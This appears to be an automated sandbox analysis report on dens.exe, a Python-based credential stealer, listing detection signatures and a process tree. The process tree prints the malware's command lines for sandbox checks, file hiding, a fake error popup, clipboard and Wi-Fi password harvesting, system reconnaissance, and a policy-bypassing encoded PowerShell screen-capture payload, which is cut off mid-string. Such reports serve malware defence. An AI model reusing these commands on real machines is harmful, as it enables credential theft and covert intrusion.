Windows
Analysis Report
dens.exe
Overview
General Information
Detection
Python Stealer, Exela Stealer, Waltuhium Grabber
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Exela Stealer
Yara detected Python Stealer
Yara detected Waltuhium Grabber
AI detected suspicious sample
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Classification
- System is w10x64
- dens.exe (PID: 6248 cmdline: "C:\Users\user\Desktop\dens.exe" MD5: 258322C37F4F5C632BD6C79520899603)
- dens.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\dens.exe" MD5: 258322C37F4F5C632BD6C79520899603)
- cmd.exe (PID: 5932 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 980 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cmd.exe (PID: 1136 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 3020 cmdline: wmic computersystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cmd.exe (PID: 2044 cmdline: C:\Windows\system32\cmd.exe /c "gdb --version" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5344 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 6904 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 732 cmdline: C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 6432 cmdline: wmic path Win32_ComputerSystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cmd.exe (PID: 3624 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 4632 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cmd.exe (PID: 6392 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 1732 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 1344 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- attrib.exe (PID: 6484 cmdline: attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
- cmd.exe (PID: 6560 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- mshta.exe (PID: 2812 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- cmd.exe (PID: 1748 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 4460 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 6544 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 3624 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4504 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 4284 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 1352 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1900 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 3488 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- netsh.exe (PID: 6392 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
- cmd.exe (PID: 3652 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewall info#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- systeminfo.exe (PID: 2128 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
- WmiPrvSE.exe (PID: 7172 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
- HOSTNAME.EXE (PID: 7380 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
- WMIC.exe (PID: 7400 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- net.exe (PID: 7456 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- net1.exe (PID: 7472 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
- query.exe (PID: 7488 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
- quser.exe (PID: 7504 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
- net.exe (PID: 7536 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- net1.exe (PID: 7560 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
- net.exe (PID: 7588 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- net1.exe (PID: 7608 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
- net.exe (PID: 7628 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- net1.exe (PID: 7640 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
- net.exe (PID: 7668 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- net1.exe (PID: 7680 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
- WMIC.exe (PID: 7700 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- tasklist.exe (PID: 7760 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- ipconfig.exe (PID: 7844 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
- ROUTE.EXE (PID: 7868 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
- ARP.EXE (PID: 7884 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
- NETSTAT.EXE (PID: 7900 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
- sc.exe (PID: 7916 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- netsh.exe (PID: 7940 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
- netsh.exe (PID: 7968 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
- cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 8088 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cmd.exe (PID: 8128 cmdline:
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdA